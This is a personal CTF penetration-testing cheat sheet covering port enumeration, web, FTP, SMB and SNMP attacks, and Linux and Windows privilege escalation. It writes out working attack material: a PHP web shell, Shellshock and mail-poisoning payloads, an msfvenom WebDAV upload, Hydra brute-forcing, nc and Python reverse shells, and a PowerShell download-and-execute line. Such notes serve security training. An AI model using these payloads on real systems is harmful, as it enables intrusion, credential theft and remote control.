Malrawr's Penetration Testing Workflow (CTF)
These notes are currently a work in progress. The goal is to create a complete workflow sheet using all my notes. It may be a little messy at first but I plan to organize it as time goes on.
`7MMM. ,MMF' db `7MMF' `7MM"""Mq. db `7MMF' A `7MF'`7MM"""Mq.
MMMb dPMM ;MM: MM MM `MM. ;MM: `MA ,MA ,V MM `MM.
M YM ,M MM ,V^MM. MM MM ,M9 ,V^MM. VM: ,VVM: ,V MM ,M9
M Mb M' MM ,M `MM MM MMmmdM9 ,M `MM MM. M' MM. M' MMmmdM9
M YM.P' MM AbmmmqMA MM , MM YM. AbmmmqMA `MM A' `MM A' MM YM.
M `YM' MM A' VML MM ,M MM `Mb. A' VML :MM; :MM; MM `Mb.
.JML. `' .JMML..AMA. .AMMA..JMMmmmmMMM .JMML. .JMM..AMA. .AMMA. VF VF .JMML. .JMM.
Initial Scan
Save time and do a full port scan of the machine. This let's you have a fully comprehensive over view of the machine. It's really easy to miss something if you do a standard scan, especially in a CTF which is more puzzle-like. Usually a TCP scan is all you need when doing CTFs, but sometimes it might be wise to do a UDP scan as well.
NMAP
For an indepth TCP nmap
scan you can do something along the lines of: nmap -sC -sV $IP_ADDRESS -p-
The
-p-
flag innmap
means to scan all ports.
For a UDP scan it's generally better to not scan every port: nmap -sC -sV -sU -T4 $IP_ADDRESS --top-ports
The
-T4
flag adjusts the timing and speeds up the scan time.
Using nmap
nse
scripts you can also enumerate using scripts that detect vulnerabilities: nmap --script *vuln* --script-args=unsafe=1 $IP_ADDRESS -p $PORTS
Use this
nmap
scan with caution, it can potentially take down any weak services. Generally you shouldn't go all out with using this.
Quickfire
One of the downsides of doing a full port scan is the amount of time it takes. In order to remedy this I've created a wrapper that combines masscan
and nmap
together (https://gitlab.com/malrawr/quickfire). This makes it much faster than just relying on nmap
alone. Additionally it can use amap
to give you more information about each open port that you are dealing with.
Port Enumeration
Always check everything very closely and go through each port one by one. Sometimes ports are tricky, expecially HTTP ports. One way to check a port that you're unsure about is to use curl
. curl
is normally used for HTTP, however it can be used on any port to see what protocol the ports asks for. It's particularly helpful in finding those odd HTTP ports really quick.
`curl $IP_ADDRESS:$PORT`
Another tool to use is amap
, it generally gives more detailed information about a port.
amap $IP_ADDRESS:$PORT
Search everything that you encounter, such as programs and their version numbers. Use either searchsploit
or google dorks using site:exploit-db.com/exploits/
Using google dorks instead of searching manually through the exploitdb website will allow you to avoid using the website captcha.
When searching for the version number of an application be sure to also test the older version exploits, even though they may be listed as an older version it can also mean that other versions are also susceptible to the same vulnberability
One last important thing to remember is to take advantage of
nmap
nse
scripts. If you find a port that you believe may be vulnerable to something try to see if there's anmap
nse
script for that. You can find them by usingupdatedb
andlocate *.nse
.
Enumerating Ports with Metasploit
You can use Metasploit to search for auxillary, exploit, and payload modules by using the search
command.
msf > search port 22
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/2wire/xslt_password_reset 2007-08-15 normal 2Wire Cross-Site Request Forgery Password Reset Vulnerability
auxiliary/admin/android/google_play_store_uxss_xframe_rce normal Android Browser RCE Through Google Play Store XFO
auxiliary/admin/atg/atg_client normal Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
auxiliary/admin/hp/hp_imc_som_create_account 2013-10-08 normal HP Intelligent Management SOM Account Creation
auxiliary/admin/http/allegro_rompager_auth_bypass 2014-12-17 normal Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass
auxiliary/admin/http/hp_web_jetadmin_exec 2004-04-27 normal HP Web JetAdmin 6.5 Server Arbitrary Command Execution
auxiliary/admin/http/kaseya_master_admin 2015-09-23 normal Kaseya VSA Master Administrator Account Creation
auxiliary/admin/http/limesurvey_file_download 2015-10-12 normal Limesurvey Unauthenticated File Download
auxiliary/admin/http/manageengine_dir_listing 2015-01-28 normal ManageEngine Multiple Products Arbitrary Directory Listing
auxiliary/admin/http/manageengine_file_download 2015-01-28 normal ManageEngine Multiple Products Arbitrary File Download
FTP - 21
First step when finding a FTP server is to see if there's anonymous login. If there is anonymous login what can you do with it? Enumerate all files if you can.
Whenever there is anonymous upload, always enumerate the files, you may be able to find passwords or system information and also test if you can upload files, if you can upload then try to see if you can execute them
- Does the FTP server have a
wwwroot
directory? Is it possible to upload files into this directory? - Does the FTP server have arbitrary file access? What information can you find?
- What is the OS version?
- What information can you find about other services?
- Can you find any passwords?
Nmap has a number of NSE scripts that may be helpful for enumerating FTP:
nmap --script ftp* $IP_ADDRESS -p 21
Open OS Filesystem
Sometimes FTP is misconfigured to the point where you can view the entire file system of the machine.
- Windows
- Windows XP
C:\Windows\System32\eula.txt
- Windows 7
C:\Windows\System32\license.rtf
- Windows XP
- Linux
cat /etc/lsb-release
cat /etc/issue.net
- Debian
cat /etc/debian_version
- Red Hat
cat /etc/redhat-release
SSH - 22
It's uncommon to find a vulnerability for SSH. Usually the only way of getting in through this to bruteforce using hydra
or if you found a user and password.
A good way to see if a user exists on SSH is to use SMTP to VRFY users. If the user exists and you found a password somewhere, that could be your ticket in.
SMTP - 25
Use SMTP to verify that a user exists. For example, if you find a user while enumerating another application, if you want to check that the user exists on the system you can verify using SMTP. If that user exists you can possibly try logging in with SSH as the user using a password from the other application.
DNS - 53
- When you see DNS open it probably means that it's using a different hostname/virtual host, this is further established by the fact that if you visit the IP address a default index page is served. This indicates DNS misconfiguration.
- Basically look out for virtual hosts
curl -H 'Host: virtualhost.host' http://127.0.0.1/
- Can also add the host to your
/etc/hosts
file
- Can also add the host to your
- You can also use the following commands to map out the target; it'll show what the IP maps out to/zone name. You can also use the virtual host name/zone name to do it in reverse and see if it maps to an IP address.
```
nslookup
server $IP_ADDRESS $IP_ADDRESS or $VIRTUAL_HOST_NAME ```
- Basically look out for virtual hosts
- DNS Zone Transfer Records
- Helps you find records, if TCP 53 port is open then that means you'll be able to get these records and enumerate the machine
dig axfr @<IP ADDRESS> <ZONE NAME>
---- Note: Theis what you find from nnslookup - This will show you more subdomains used in the DNS Zone Transfer, you can then add this list to your
/etc/hosts
file so that you can visit them easily without modifying Burp's headers
- This will show you more subdomains used in the DNS Zone Transfer, you can then add this list to your
HTTP/HTTPS - 80/443 & Other Ports
When visiting websites it's important to find as much infromation as you can. You have to manually poke around, don't rely on an automated scanner like nikto
to find things out for you.
Questions to Ask
- Does the source mention anything about a program? Does the source contain any version numbers?
- What language is the server running? PHP? ASP? Etc.
- This is important for uploading or knowing vulnerabilities
- For example. Let's say you found a host running FTP and HTTP servers. You also discover that you can upload through FTP and access the file through HTTP. Well to execute that file it has to be readable by the server.
- This is important for uploading or knowing vulnerabilities
- What filetypes does the server allow for uploading?
- Perhaps, you can take advantage of this by generating a payload with a specific format.
bash msfvenom --help-formats Executable formats asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war Transform formats bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
- Perhaps, you can take advantage of this by generating a payload with a specific format.
- Is there a login page?
- Have you tried using default credentials?
- Have you tried using google to find default credentials for the application and version?
It's a good idea to create a custom wordlist with default credentials, so that you can use
hydra
to automate it while you poke around. I talk more about this in thehydra
section below.
- Does the web application have an admin console? Can you exploit it?
- Does the web application allow uploading?
- It allows uploading but it won't accept my file type?
- Try checking to see if it uploads it anywayy but in a Temp folder?
- Is there a way to bypass the file check?
- Try seeing if you can upload a malicious file that it can accept?
- I uploaded my file but I don't know how to access it?
- Did you try seeing if you could traverse directories?
- Perhaps you can try using an LFI to visit the file
- It allows uploading but it won't accept my file type?
- Does the website use WEBDAV?
- Can you upload into it?
- Try Cadaver?
Check the webdav section for more information
Visit Website
- When checking a new site using
burp suite
try changing the 'Host' field. Instead of the IP, you change it to the domain name of the server. This is for Virtual Host routing. The server will look at the new header and try to to see if a different location exists. - Try using
curl
on pages, they may display something different compared to when using the 'view source' page on FireFox
Gather Info
whatweb http://127.0.0.1/index.html
- It gives you a general idea of the underlying technologies running on a website
Directory Brute Force
dirb http://127.0.0.1 -r -o tmp.dirb
- r - disable recursive mode
- o - output to file
- dirbuster
- Use multiple wordlists:
/usr/share/dirb/wordlists/common.txt
`/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/usr/share/wfuzz/wordlist/general/megabeast.txt
- Use common extensions
/usr/share/wfuzz/wordlist/general/extensions_common.txt
- Use the tabs to sort results by response
- Use multiple wordlists:
Uploading Stuff to Web Applications
- Some times a specific file type is requested, there are a few ways to bypass this:
- Magic Bytes
- These are the first few strings in a file that say what the file is, you can copy enough from a valid file and then put your malicious string after that. To check if it's being properly concealed you can use the bash
file
command and see what file it thinks it really is.
- These are the first few strings in a file that say what the file is, you can copy enough from a valid file and then put your malicious string after that. To check if it's being properly concealed you can use the bash
- Add double the extension
- Let's say it's looking for a
PNG
file, you can do something likeevil.png.php
, the.png
inspection is just in case the website tries to see if it's valid.- You can do variations of this also.
- Let's say it's looking for a
- Magic Bytes
Uploading Web Shells
- Simple Webshell
<?if($_GET['cmd']) {system($_GET['cmd']);}?>
- Microsoft ISS
- Try both
asp
oraspx
shells- This mostly depends on the version of ISS that is running.
- Try both
Wordpress
- Scan with
wpscan
and check out the admin pages to see what you can with findwpscan --url http://10.10.10.10/ --enumerate u
orwpscan --url http://10.10.10.10/ --enumerate u --log
- Scans for users using
--enumerate u
- Scans for users using
- Wordlists To Use
/usr/share/seclists/Discovery/Web_Content/CMS/wordpress.fuzz.txt
/usr/share/seclists/Discovery/Web_Content/CMS/wp_plugins.fuzz.txt
/usr/share/seclists/Discovery/Web_Content/CMS/wp_themes.fuzz.txt
Shellshock
- If you find a random sh file on a website directory test it for Shellshock
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" $IP/cgi-bin/user.sh
- CGI-BIN or .cgi using programs like Webmin are usually susceptible to Shellshock
- In Burp change the
User-Agent
to:User-Agent: () { :; }; echo hi
- In Burp change the
- Some servers react differently to ShellShock, for example Apache will respond immediately but Webmin may not show a response.
- You can use something like
() { :; }; sleep 10
to see the time it takes to respond, if a server usually responds to a request in 2 seconds, but after using thesleep
command it's longer than that chances are that it is vulnerable.
- You can use something like
Directory Bruteforcing Tips
- If you can narrow down a few directories of interest, try narrowing the bruteforcing. You can use a giant wordlist on just one directory in order to enumerate it well.
Proxies
- When going through proxies try experimenting with the names of the IP addresses in order to gain access, similar to DNS.
- Lookout for virtual hosts
curl -H 'Host: virtualhost.host' http://127.0.0.1/
- Can also add the host to your
/etc/hosts
file
- Can also add the host to your
- Lookout for virtual hosts
Attacking Login Pages
Whenever you're enumerating a webpage you should run sqlmap
in the bkacground while you poke around. At the same time you can also use
SQLMAP
- Capture the post request of the login screen and paste it into a new file
- Use the following commands to run, either one works, you can press enter for default options whenever it prompts
sqlmap -r login.req
sqlmap -r login.req --level 5 --risk 3
Hydra
Bruteforce all login pages that you see, even though you can just manually put in entries yourself and reload. It's faster to just use Hydra while you do other stuff.
Hydra Flags used in example, from man pages:
-f
exit when a login/pass pair is found
-l
login with LOGIN name
To use hydra without a username do
-l ""
*-P
load several passwords from FILE
- When bruteforcing pages, you need to specify the plugin used. In this example it is
http-post-form
.There's a difference between
http-post-form
andhttps-post-form
. Make sure you use the right one appropriate to the protocol. - Use
burp
to create capture a post request to the website - Put in the post request line from
burp
, replace the user and password with^USER^
or^PASS^
. - After that you append something from the page the happens when a login page is not successful, in this case the phrase
is incorrect
appears
root@kali:~/tmp/htb/apocalyst# hydra -f -l falaraki -P list.txt apocalyst.htb http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1:is incorrect"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-31 00:58:03
[DATA] max 16 tasks per 1 server, overall 16 tasks, 486 login tries (l:1/p:486), ~31 tries per task
[DATA] attacking http-post-form://apocalyst.htb:80//wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1:is incorrect
[80][http-post-form] host: apocalyst.htb login: falaraki password: Transclisiation
[STATUS] attack finished for apocalyst.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-31 00:58:38
The example above is from a retired HTB machine named Apocalyst
Default Passwords or Obvious Passwords
- The user/password field could be the name of the application or something on the same page
- The rational behind this is that it's something easily findable on the page so that a lazy system administrator remember in the future.
- You can use
cewl
to get an idea of what the password can be.
- You can use
- Use the
cewl
wordlist to create a custom wordlist and bruteforce the page with it.
- The rational behind this is that it's something easily findable on the page so that a lazy system administrator remember in the future.
Local File Inclusion (LFI)
- When you find an LFI vulnerable page, see if it has any passwords listed on it that you can use. Usually the one listed the most is vulnerable.
- Check
/etc/fail2ban/fail2ban.conf
- This is an application that blocks the use of Hydra and other brute-force tools. If that exists then it means we can't brute-force, so we'll have to input passwords in manually.
/proc/self/status
- You can find the uid and gid of the current user.
- Use the UID found to see what the user is in the
/etc/passwd
file
/proc/self/environ
- If you have access to this file you can modify your user agent line to be a php command and it will execute on the machine
~.ssh/id_rsa
- Instant private key
-
Poisoning Mail
- When connecting to SMTP using telnet, wait for the mail server to respond back with their banner.
- Then do the following:
EHLO `hacker.htb` VRFY target@localhost <-- This is the user that the server is running as mail from:[email protected] rcpt to: target@localhost data Subject: <whatever> `<?php echo system($_REQUEST['evil']); ?>` . <-- This is to end the message
It should then say that the message is queued. Using the LFI visit the mail file,../../../var/mail/target%00&evil=whoami
* You should of achieved command execution.Webdav
First check how
webdav
works with the server version. It might require a certain trick for uploading to work. - When connecting to SMTP using telnet, wait for the mail server to respond back with their banner.
-
For example, you generate a msfvenom reverse shell in
asp
format calledevil.txt
. - After uploading with
curl -T evil.txt http://<IP ADDRESS>/
you then usecadaver http://<IP ADDRESS>/
in order to rename the file fromevil.txt
toevil.asp;.txt
.
This takes advantage of the servers vulnerability.
An example of this process is below:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP ADDRESS> LPORT=443 -f asp > evil.txt
curl -T evil.txt http://<IP ADDRESS>/
cadaver http://<IP ADDRESS>/
dav:/> copy evil.txt evil.asp;.txt
Then you execute the file by visiting the file using the browser or curl
.
TFTP - 69U
Treat TFTP like you do FTP. TFTP is generally more common in Windows machines.
POP3 - 110
RPC - 111
SMB - 139/445
SMB generally releases a lot of information. The quickest way to enumerate this service is by using enum4linux
.
enum4linux -a $IP_ADDRESS
Viewing Shares
If a share is found you can view and access it using smbclient
.
View share names, share types, and comments: smbclient -L $IP_ADDRESS
Accessing shares: smbclient '//$IP_ADDRESS/$SHARE_NAME>'
Navigating through SMB shares is similar to FTP. They can also share similar vulnerabilities such as arbitrary file access.
Common Exploits
Scanning for these vulnerablities using
nmap
may crash the SMB service
MS08-067
Check with: nmap --script smb-vuln-ms08-067.nse -p445 $IP_ADDRESS
MS17-010
Check with: nmap --script smb-vuln-ms17-010.nse -p445 $IP_ADDRESS
SNMP - 161
Simple Network Management Protocol (SNMP) is used for network management. When this is exposed it is possible to retrieve genreal system information such as hostname and OS version. You can also get information such as open ports and connections (basically netstat
info) as well as processes and devices in use. Information such as software installed and their versions is included as well.
If you see this port open in a machine use onesixtyone $IP_ADDRESS
which will reveal OS info.
Also use snmp-check $IP_ADDRESS
which reveals everything about a server such as: OS Version, Users, Processes, Hotfixes, etc.
Alternatively, included in
Metasploit
there areScanner SNMP Auxillary Modules
that you can select from and enumerate with.
Privilege Escalation
Privilege escalation is the result of actions that allows an attacker to obtain a higher level of permissions on a victim's system or network.
Moving Files From Attacker to Victim
Use Python's SimpleHTTPServer module for transfering files from your computer to your victim.
On Linux machines you can then use wget
or curl
to request the files. Alternatively you can do the -r
recursive flag with wget
in order to download everything on that web folder at once.
On Windows you can use PowerShell
. Assuming you are using PS 3.0 and wget
is set up as an alias for Invoke-WebRequest
, you can do something like the following: wget http://10.10.10.10:8080/evilfile.exe -OutFile evilfile.exe
Linux System
- List commands that the user can do
- sudo -l
$ sudo -l
sudo -l
Matching Defaults entries for www-data on webbox:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on webbox:
(scriptworker : scriptworker) NOPASSWD: ALL (scriptworker : scriptworker) NOPASSWD: ALL
Basically this let's you work on any files or binaries/executables that is owned by the scriptworker
group.
Linux Enumeration Scripts
Whenever you have user access inside a box, you should start off with one of the enumeration scripts below and examine the output after. Generally I like working from the /dev/shm
directory instead of /tmp
so I store all my work on there.
LinEnum.sh
- It has the -t flag for thorough checks
linuxprivchecker.py
unixprivesc.sh
Resources
- https://www.rebootuser.com/?p=1623
Using a Working Directory
/tmp
or/var/tmp
- A good directory for temporary work files
/dev/shm
- Saves into ramdisk so that it doesn't get saved in the HDD
- Whenever the server gets reboot everything is cleared
Spawn a TTY Shell
python -c 'import pty; pty.spawn("/bin/sh")'
orpython -c 'import pty; pty.spawn("/bin/bash")'
- This is a simple TTY shell that just has basic functionality
https://github.com/infodox/python-pty-shells
- Here you can find a collection of shells that give full functionality, similar to a SSH shell. The best shell to use is the
tcp_pty_backconnect.py
and thetcp_pty_shell_handler.py
for the handler. - One Liner TCP PTY Backconnect
python -c 'import os,pty,socket; lhost = "127.0.0.1"; lport = 31337; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv("HISTFILE","/dev/null"); pty.spawn("/bin/bash"); s.close();'
- Here you can find a collection of shells that give full functionality, similar to a SSH shell. The best shell to use is the
Other Tips - Getting Advanced Terminal Control (Bash Completion, History, and Arrow Usage)
- First get Python Shell, the shell needs this in order to work
- python -c 'import pty; pty.spawn("/bin/bash")'
- Background terminal with CTRL Z
stty raw -echo
- This tells the terminal to not process special characters and instead it to the next terminal which is the reverse shell we're in.
- Grab the environment term info
root@kali:/# echo $TERM
xterm-256color
- Bring the terminal back to the foreground using
fg
- Now you can export your term variable
export TERM=xterm-256color
- After completing these steps you should now have proper terminal control
- NOTE: MAYBE JUST NEED THIS
CTRL - Z
stty raw -echo
fg
- Reset the terminal with
reset
- It'll prompt for the terminal so put in
xterm-256color
<--- it's the Kali'secho $TERM
- It'll prompt for the terminal so put in
- Change size so that VIM works better
- On personal terminal type: stty size
- On target machine type the numbers you received:
stty rows ## cols ###
Most Reliable Reverse Shell from Pentest Monkey
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Misc. Linux
Here are miscellaneous commands.
Finding Deleted Files
- Sometimes you have to look through deleted files on a partition
grep -a '' /dev/sdb
- This will show every file on the partition, it's only good for small USBs
- You can do something like the following if you want to find something specific on a larger partition
grep -a 'password' /dev/sdb
Windows System
Gaining Reverse Shells
- Unicorn Shell: https://github.com/trustedsec/unicorn
- It basically let's you setup a quick Meterpreter shell be generating quick PowerShell Shell Code that you can paste into the target's console.
- It helps to rename the file as
.ps1
and remotely execute it on the target machine instead of pasting into thecmdline
unicorn.py windows/meterpreter/reverse_tcp 10.10.14.2 37337
msfconsole -r unicorn.rc
Windows File Transfers
powershell "IEX(New-Object Net.WebClient).downloadString
('http://127.0.0.1:80/index.html')"- Tells PowerShell to go to a website and execute whatever is on that page.
Windows Enumeration with Meterpreter
sysinfo
- meterpreter
- Look at the OS and Architecture
- What version of Meterpreter are we running? 32 or 64 Bit?
getuid
- meterpreter
- View current user
Using Post Modules
post/multi/recon/local_exploit_suggester
- Looks at all KBs applied to that machine and then returns suggestions
- Note the version of Meterpreter that we're running earlier
- 32 Bit and 64 Bit return different suggestions
- After it's complete change the process to the 64 Bit
- Run the command
ps
- This lists all the proccess being run as well as the architecture
- Look for processes that are x64 and have a value of 1 for the Session column
- The 1 means it's interactive which allows for more permissions
migrate <PID>
- Migrates a shell to that process
- Run the module again and note the suggestions, if there are identical matches to the 32 bit version then that exploit has a high chance of working
- Run the command
Windows Enumeration without Meterpreter
systeminfo
- cmd.exe
- Look for the OS Version and the Hotfixes
- If there's no hot fixes applied, it says "N/A" then it'll probably be vulnerable to something since it's never been updated since it was installed
- Correlate the age of the OS to the years that exploits came out
- For example if you have a Windows 7 box that has no updates since it came out, which was 2009. Then the list provided by the Metasploit module may work since it has never been updated.
- Correlate the age of the OS to the years that exploits came out
- If there's no hot fixes applied, it says "N/A" then it'll probably be vulnerable to something since it's never been updated since it was installed
PowerShell Module - Power UP
- Mainly looks at PrivEsc through service misconfigurations, not really through patches like the Metasploit Module
- Windows Enumeration
- Scripts
- https://github.com/joshruppe/winprivesc
- https://github.com/GDSSecurity/Windows-Exploit-Suggester
- https://github.com/pentestmonkey/windows-privesc-check
- Cheat-sheets
- https://www.joshruppe.com/basic-windows-enumeration
- http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
- Scripts
- Windows Enumeration